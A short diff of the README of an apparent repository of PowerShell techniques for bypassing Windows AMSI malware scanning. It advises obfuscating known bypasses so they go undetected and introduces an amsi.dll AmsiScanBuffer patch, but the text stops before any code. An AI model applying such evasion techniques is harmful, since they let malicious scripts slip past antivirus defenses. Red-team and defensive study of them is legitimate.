S3cur3Th1sSh1t/Amsi-Bypass-Powershell/README.md

 # Amsi-Bypass-Powershell
 This repo contains some Amsi Bypass methods i found on different Blog Posts.

+Some of the more well known Bypasses are detected by AMSI itself.
+So you have to obfuscate them via ISESteroids and or Invoke-Obfuscation to get them working.

 ## 1) Patching amsi.dll AmsiScanBuffer by rasta-mouse
 ```
 $Win32 = @"